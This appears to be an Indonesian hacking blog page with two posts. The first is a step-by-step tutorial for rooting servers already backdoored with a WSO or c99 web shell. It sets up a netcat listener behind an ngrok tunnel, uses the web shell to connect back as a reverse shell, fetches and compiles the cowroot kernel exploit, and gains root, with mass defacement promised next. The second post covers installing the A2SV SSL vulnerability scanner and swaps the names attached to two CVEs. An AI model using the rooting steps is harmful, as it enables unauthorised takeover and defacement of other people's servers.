Selasa, 22 Mei 2018

Tutorial Rooting Server With Ngrok Dan Cowroot



Halo para hekre :v kali ini gua mau berbagi rooting server menggunakan ngrok dan localroot cowroot, sebelumnya gua pengin bikin menggunakan localroot dirty.c cuman loginya lama :v dan disarankan oleh Agus Setya R A.K.A L0c4lh34rtz untuk makai cowroot, dan jos :v lebih cepet dan lebih crot dah :v  oke langsung aja

Bahan - Bahan :

1.ngrok
2.localroot cowroot (Disini)
3.shell kernel 2016 ke bawah
4.netcat
(pastikan udah keinstall semua bahan bahan nya ea)




1. setting ngroknya dulu gan ikuti dibawah ini
root@Mr.Bro_Tx:-#./ngrok tcp 1337
(1337 port yang lu gunakan)
oke kalo sudah  balik keterminal dan liat ip dan port nya di ngrok





note : 0.tcp.ngrok.io (host yang kita gunakan) , 13433 (port yang kita gunakan)


Kedua Setting Netcatnya :Buka Terminal Baru Lagi Lalu
ketik :
root@Mr.Bro_Tx:-#netcat -lnvp 1337    > 1337 port yang kita buat tadi di ngrok
(biarin dia ngelistening , tinggalin jangan di pantengin next step 3 )



Ketiga :
kita balik lagi ke shell backdoor kita (saran shell wso /c99 /apalah :v yang ada function bindport )saya menggunakan shell wso
selanjutnya klik network pada shell
lalu isi bagian server dan port
Server : 0.tcp.ngrok.io
port : 13433 (port yang di ngrok nya)





setelah itu balik lagi keterminal yang listening tadi liat udah terhubung belom kalau udah next step 4


STEP 4
kita wget localrootnya
ketik di terminal :
wget linklocalroot






setelah selesai nge wget saatnya kita compile cowrootnya
ketik :
root@Mr.Bro_Tx:-# gcc cowroot.c -o cowroot -pthread root@Mr.Bro_Tx:-#./cowroot
disni lah kehebatan cowroot tanpa menunggu lama untuk konek :v langsung ketik
root@Mr.Bro_Tx:-#id nanti keluar lah rootnya :v Liat Gambar


 

Dooor berhasil ter urut gan :v dah jadi heker pro lo :v setelah itu silahkan agan agan mau ngapai aja :v tutorial selanjutnya gua bakal ngasih Mass Deface After Rooting Server :v


Cukup sekian Terima gaji kurang lebihnya mohon maaf minal aidzin wal faizin :v


thanks To:Mr.TenWap-4WSec - T3754K1T1 Crew - IndoXploit and All Member AnonCyberTeam
dan terima kasih juga buat Mrs.May Yang udah support selalu :)

Read More ->>

Senin, 21 Mei 2018

Deteksi Celah Pada SSL dengan A2SV - Auto Scanning to SSL Vulnerability

Yoo Udah lama ga nulis artikel kali in gua mau berbagi sedikit ni tentangAuto Scanning SSL Vulnerability
Banyak sekali bug SSL yang wajib diwaspadai. Salahsatunya heartbleed yang memungkinkan attacker untuk mendapatkan informasi sensitif seperti user dan password secara ilegal. Nah kali ini saya akan membahas tools yang berguna untuk mendeteksi celah pada situs ber-https (ssl) sehingga kita bisa melakukan patching lebih dini sebelum bug tersebut dieksploitasi oleh attacker.

A2SV sendiri akan melakukan scanning otomatis terhadap target yang kita tentukan.
Berikut list vulnerability yang dapat dideteksi oleh A2SV :
  • [CVE-2014-0160] CCS Injection
  • [CVE-2014-0224] HeartBleed
  • [CVE-2014-3566] SSLv3 POODLE
  • [CVE-2015-0204] FREAK Attack
  • [CVE-2015-4000] LOGJAM Attack
  • [CVE-2016-0800] SSLv2 DROWN

Sementara ini developer juga sedang mengembangkan tools ini sehingga di versi mendatang kemungkinan tools ini juga akan ditambahkan modul baru untuk mendeteksi SSL ACCF.
Cara instalasi A2SV :
$git clone https://github.com/hahwul/a2sv.git
$cd a2sv
$sudo bash install.sh
$a2sv
Untuk list command yang bisa dipakai silahkan diceek dengan command
$a2sv -h
Untuk scanning target secara menyeluruh bisa langsung menggunakan opsi " -t " saja.
Contoh :
$a2sv -t bing.com
Jika proses scanning sudah selesai maka hasilnya akan tampil di terminal, apakah server yang kita scan terdapat celah atau tidak.
Karena tools ini juga terus dikembangkan, ada baiknya kalian juga cek secara berkala.
Untuk update tools ini masukkan command :
$a2sv --update
Oke sekian artikel kali ini, semoga bermanfaat.

source : https://www.linuxsec.org

Thanks To:Mr.TenWap-4WSec - T3754K1T1 Crew - IndoXploit and All Member AnonCyberTeam
dan terima kasih juga buat Mrs.May Yang udah support selalu :)
Read More ->>
Diberdayakan oleh Blogger.